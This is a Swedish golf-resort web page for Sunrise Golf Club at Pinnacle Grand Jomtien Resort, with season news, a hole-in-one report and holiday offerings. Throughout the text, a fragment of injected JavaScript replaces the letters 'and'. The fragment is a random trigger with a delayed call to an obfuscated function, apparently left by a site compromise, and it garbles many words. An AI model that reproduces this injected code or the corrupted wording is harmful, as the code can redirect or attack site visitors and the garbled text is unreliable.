Aktivitetskalender
2016-2017
Öppna kalender
Första resan till Soi Dao Highlandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and med 2 golfrundor och 1 övernattning.
07 Mar 17
Nu har vi spelat ett antal veckor utan uppdatering på hemsidan men vi har varit 30-35 golfare under februari månad. Nu i mars så åker flera hem me ...
Golf vecka 5 med en Hole in One på Laem Chabang 8B
07 Feb 17
Vecka 5 den 1 februari då hände det som vi normalt har varje år och Luigina gjorde en ”Hole In One” på Laem Chabang hål 8B samma som ...
Veckan som var 23-29 januari, nya utmaningar i vackert väder.
29 Jan 17
Denna vecka så har vi spelat Royal Lakeside den 23 januari, Laem Chabang och Parichat 25 januari, Eastern Star 26 januari samt självklart fredags ...
Fredag den 20 januari och vår fredagstävling på Phoenix
24 Jan 17
Vi spelade 2 manna bästboll poäng boggy där ett resultat räknades på hål 1-15 och båda på dom 3 sista hålen. Vinnare var 3 lag på 42 poäng. ...

Välkommen till oss


Vi önskar alla hjärtligt välkomna till säsongen 2016-2017

BOKA IN DIG SÅ SNART SOM MÖJLIGT FÖR ATT GARANTERA EN PLATS HOS OSS
Här finns allt du kan önska dig av din thailandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andsvistelse oavsett om du söker; vila, sol, bad, golf, aktiviteter, utflykter, shopping eller spännandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande upplevelser.

IMG_3872

PASSAR ALLA
Pinnacle Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and Jomtien Resort är det perfekta resemålet för golfare eller bara ha en skön semester. Vill man koppla av eller ha en aktiv semester så passar vårt koncept bra. Spela golf med vårt arrangerade golfprogram eller ta del av andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andra aktiviteter såsom utflykter till sevärdheter, badturer till andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andra öar och stränder, shoppingresa till Bangkok etc. Vill man ta det lugnt så finns det fyra pooler samt en egen strandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and för att kunna ligga i en solstol och bara njuta.

BEHAGLIGT, BARNVÄNLIGT OCH PRISVÄRT BOENDE
Vi kommer att erbjuda barnfamiljpaket och boende även för de som inte spelar golf eftersom resorten har så mycket att erbjuda, vi återkommer inom kort med erbjudandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}anden.

IMG_3085

UPPLEV GOLFPARADISET MED VÅRA GOLFGUIDER
Är du golfälskare och bor hos oss får du ditt lystmäte mättat eftersom det finns så många golfbanor i området. Vi spelar en blandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andning av allt från medelsvåra till riktigt bra mästerskapsbanor sex dagar i veckan under högsäsong. Från söndag till fredag så erbjuder vi arrangerat golfspel och vi varierar som sagt banorna och du som gäst väljer och vrakar efter dina behov.

Prova något av våra golfkoncept ”BRA+,  BÄTTRE+ eller BÄST+”

C2

 

SUNRISE GOLF CLUB – FÖR DIG SOM ÄR AKTIV ELLER BARA VILL KOPPLA AV
På vårt servicekontor som finns mittemot frukostrestaurangen, finns det personal som talar svenska under högsäsong, vi ordnar och servar er på praktiskt taget med allt du kan begära via vår klubb.

Kolla aktivitetskalendern på startsidan, där ser du alla våra aktiviteter under säsongen 2016-2017.

IMG_3440

 

BESÖK TILL TROPISKA ÖAR ELLER LATA DAGAR VID POOLEN
Du kan också besöka hundratalet tropiska öar, Coral Islandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and, Koh Samed och Koh Chang är några av de mest berömda. Vissa av dem är obebodda och andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andra har full service och högklassiga hotell. Kontakta oss så hjälper vi dig med förslag och bokningar.  Vill du hellre bara ligga och läsa en bok och bli uppassad går det precis lika bra.

Vi står redo att ta emot er,

Sunrise Golf Club och Pinnacle Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and Jomtien Resort

 

Sunrise golfare tittar på Stensson 1